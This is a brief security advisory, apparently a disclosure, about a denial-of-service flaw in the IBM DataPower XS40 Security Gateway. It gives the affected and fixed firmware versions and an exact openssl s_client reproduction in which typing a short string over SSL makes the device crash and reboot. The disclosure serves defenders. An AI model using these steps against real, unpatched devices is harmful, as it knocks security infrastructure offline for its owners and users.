It appears it is possible to crash the IBM DataPower XS40 Security Gateway device by sending a simple (random?) string to it, over an established SSL-connection. The device reboots as a response to the input. Tested vulnerable firmware is 3.6.1.5 Issue fixed as tested in 3.6.1.12 Tested as follows (entered attack-string is ´abc´ in this case): openssl s_client -connect [IP]:[port] Loading 'screen' into random state - done CONNECTED(0000078C) .. --- abc [enter][enter] read:errno=0 After this, the device crashes and reboots
